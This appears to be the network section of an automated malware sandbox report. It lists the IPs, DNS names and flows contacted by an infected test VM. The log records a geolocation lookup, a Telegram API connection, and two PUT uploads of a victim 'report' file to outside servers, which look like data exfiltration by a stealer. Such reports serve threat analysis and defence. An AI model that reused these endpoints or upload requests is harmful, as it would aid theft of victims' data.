Network Analysis
| IP Address | Status | Action |
|---|---|---|
| 104.76.70.102 | Active | Moloch |
| 129.151.210.129 | Active | Moloch |
| 138.201.197.74 | Active | Moloch |
| 149.154.167.220 | Active | Moloch |
| 164.124.101.2 | Active | Moloch |
| 167.86.115.218 | Active | Moloch |
| 185.189.159.121 | Active | Moloch |
| 208.95.112.1 | Active | Moloch |
| 5.181.12.94 | Active | Moloch |
| 65.21.49.163 | Active | Moloch |
| 89.46.80.136 | Active | Moloch |
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| r3.i.lencr.org | 104.76.70.102 | |
| ip-api.com | 208.95.112.1 | |
| api.telegram.org | 149.154.167.220 | |
| x1.i.lencr.org | 104.76.70.102 |
- TCP Requests
-
-
192.168.56.101:49172 104.76.70.102:80x1.i.lencr.org
-
192.168.56.101:49173 104.76.70.102:80x1.i.lencr.org
-
192.168.56.101:49174 138.201.197.74:8080
-
192.168.56.101:49175 149.154.167.220:443api.telegram.org
-
192.168.56.101:49165 208.95.112.1:80ip-api.com
-
192.168.56.101:49170 5.181.12.94:80
-
192.168.56.101:49171 89.46.80.136:443
-
- UDP Requests
-
-
192.168.56.101:53004 164.124.101.2:53
-
192.168.56.101:54148 164.124.101.2:53
-
192.168.56.101:55146 164.124.101.2:53
-
192.168.56.101:59002 164.124.101.2:53
-
192.168.56.101:137 192.168.56.103:137
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:59005 239.255.255.250:1900
-
GET
200
http://ip-api.com/line?fields=query,country
REQUEST
RESPONSE
BODY
GET /line?fields=query,country HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 11 Jun 2023 13:28:08 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 28
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
PUT
100
http://5.181.12.94/GxRwy_test22%40TEST22-PC_report.wsr
REQUEST
RESPONSE
BODY
PUT /GxRwy_test22%40TEST22-PC_report.wsr HTTP/1.1
Host: 5.181.12.94
Content-Length: 41893
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
GET
200
http://r3.i.lencr.org/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: r3.i.lencr.org
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/pkix-cert
Last-Modified: Sat, 13 Feb 2021 01:07:28 GMT
ETag: "60272650-51a"
Unused62: 8096267
Cache-Control: max-age=3600
Expires: Sun, 11 Jun 2023 14:29:25 GMT
Date: Sun, 11 Jun 2023 13:29:25 GMT
Content-Length: 1306
Connection: keep-alive
GET
200
http://x1.i.lencr.org/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: x1.i.lencr.org
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/pkix-cert
Last-Modified: Fri, 19 Jan 2018 23:38:04 GMT
ETag: "5a62815c-56f"
Content-Disposition: attachment; filename="ISRG Root X1.der"
Cache-Control: max-age=23298
Expires: Sun, 11 Jun 2023 19:57:43 GMT
Date: Sun, 11 Jun 2023 13:29:25 GMT
Content-Length: 1391
Connection: keep-alive
PUT
100
http://138.201.197.74:8080/GxRwy_test22%40TEST22-PC_report.wsr
REQUEST
RESPONSE
BODY
PUT /GxRwy_test22%40TEST22-PC_report.wsr HTTP/1.1
Host: 138.201.197.74:8080
Content-Length: 41893
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLS 1.2 192.168.56.101:49171 89.46.80.136:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=transfer.fragnet.gg | 14:fc:1d:17:5c:4b:36:16:b0:e2:f4:bc:bb:3f:64:68:ee:dc:39:ab |
Snort Alerts
No Snort Alerts